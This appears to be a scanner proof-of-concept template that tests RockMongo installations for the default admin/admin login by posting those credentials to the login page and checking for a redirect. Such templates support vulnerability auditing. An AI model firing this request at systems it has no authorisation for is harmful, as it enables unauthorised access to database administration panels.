id: poc-yaml-rockmongo-default-password

info:
  name: poc-yaml-rockmongo-default-password
  author: B1anda0(https://github.com/B1anda0)
  severity: high
  tags: xray-converted,ct-158732
  reference:
    - https://www.runoob.com/mongodb/working-with-rockmongo.html

http:
  - raw:
      - |
        POST /index.php?action=login.index&host=0 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302